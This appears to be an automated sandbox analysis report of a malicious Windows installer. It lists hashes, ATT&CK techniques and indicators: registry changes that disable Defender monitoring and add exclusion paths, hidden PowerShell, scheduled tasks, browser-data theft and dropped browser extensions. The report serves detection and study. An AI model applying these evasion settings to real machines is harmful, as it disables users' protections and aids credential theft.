4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
10-11-2024 05:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PL/setup.exe
Size

7.3MB
MD5

8b036a5a7406f7227ac65f44e1827fca
SHA1

3a8499ecca8be3f69cc7163b03f3f499bbe8276f
SHA256

85250ca9f679cdfebe009b7d66e409b330b35d6021e84e2ef7ceb0d64acdeff1
SHA512

91cecf5c22bd32fe5cead41884773933b49791e57e00a369818d716dea34433bb558e9feb5b2dfc37f2b4b3488c05dcc50ef1b0f267936c2945308f2e9f32b5a
SSDEEP

196608:91OeU0YzI5dCR00/4+cmJ/Dwami5rf0RejcO2h4I:3OxOCClgwa70Rej2h4I

Score

10^/10

defense_evasion discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

pid process

2996 powershell.EXE
1468 powershell.EXE
1780 powershell.EXE
2464 powershell.EXE

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

EMVGmrK.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\International\Geo\Nation EMVGmrK.exe
Executes dropped EXE 4 IoCs

Processes:

Install.exeInstall.exevWebWLI.exeEMVGmrK.exe

pid process

2964 Install.exe
2180 Install.exe
824 vWebWLI.exe
1608 EMVGmrK.exe
Indirect Command Execution 1 TTPs 2 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
defense_evasion

Indirect Command Execution
T1202

Processes:

forfiles.exeforfiles.exe

pid process

3012 forfiles.exe
2876 forfiles.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\International\Geo\Nation	EMVGmrK.exe

pid	process
2964	Install.exe
2180	Install.exe
824	vWebWLI.exe
1608	EMVGmrK.exe

pid	process
3012	forfiles.exe
2876	forfiles.exe

Loads dropped DLL 12 IoCs

Processes:

setup.exeInstall.exeInstall.exerundll32.exe

pid	process
2748	setup.exe
2964	Install.exe
2964	Install.exe
2964	Install.exe
2964	Install.exe
2180	Install.exe
2180	Install.exe
2180	Install.exe
2264	rundll32.exe
2264	rundll32.exe
2264	rundll32.exe
2264	rundll32.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

Processes:

EMVGmrK.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	EMVGmrK.exe

Drops file in System32 directory 18 IoCs

Processes:

Install.exepowershell.EXEvWebWLI.exeEMVGmrK.exepowershell.EXEpowershell.EXEpowershell.EXE

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	vWebWLI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	EMVGmrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	EMVGmrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	EMVGmrK.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	vWebWLI.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	EMVGmrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311	EMVGmrK.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	EMVGmrK.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	vWebWLI.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	EMVGmrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311	EMVGmrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7	EMVGmrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7	EMVGmrK.exe

Drops file in Program Files directory 13 IoCs

Processes:

EMVGmrK.exe

description	ioc	process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	EMVGmrK.exe
File created	C:\Program Files (x86)\oWxSecJNU\rzgGdAH.xml	EMVGmrK.exe
File created	C:\Program Files (x86)\YNUWFfCEdUiU2\wAkOdaJtnCYpI.dll	EMVGmrK.exe
File created	C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\caaUEUk.xml	EMVGmrK.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	EMVGmrK.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	EMVGmrK.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	EMVGmrK.exe
File created	C:\Program Files (x86)\YNUWFfCEdUiU2\ioOgwSz.xml	EMVGmrK.exe
File created	C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\dQfGPhl.dll	EMVGmrK.exe
File created	C:\Program Files (x86)\LsajhStaXkJRC\nLrhEQW.dll	EMVGmrK.exe
File created	C:\Program Files (x86)\LsajhStaXkJRC\mbnEyUI.xml	EMVGmrK.exe
File created	C:\Program Files (x86)\QpigBxJgKxUn\qLlRXkU.dll	EMVGmrK.exe
File created	C:\Program Files (x86)\oWxSecJNU\AOatCp.dll	EMVGmrK.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job	schtasks.exe
File created	C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job	schtasks.exe
File created	C:\Windows\Tasks\zeLHdclAQOoTZxj.job	schtasks.exe
File created	C:\Windows\Tasks\dBpreMcpfXbehynYz.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exereg.execmd.exeschtasks.exeschtasks.execmd.exereg.execmd.exereg.exeschtasks.execmd.exeschtasks.exeschtasks.exereg.exereg.exeschtasks.exeInstall.execmd.exeschtasks.exereg.exereg.exereg.exereg.exeforfiles.exeschtasks.exereg.exereg.exereg.exeschtasks.exeschtasks.exeschtasks.exereg.exereg.exereg.exeschtasks.exereg.execmd.execmd.exeInstall.execmd.exereg.exereg.exereg.exeschtasks.exeschtasks.execmd.exereg.exereg.exereg.exereg.exereg.exereg.exerundll32.exereg.exeschtasks.exereg.exereg.exeschtasks.exeschtasks.exereg.exeschtasks.exesetup.execmd.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

EMVGmrK.exewscript.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	EMVGmrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	EMVGmrK.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDetectedUrl	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f012f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	EMVGmrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	EMVGmrK.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	EMVGmrK.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDecisionTime = a02ecf142e33db01	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	EMVGmrK.exe
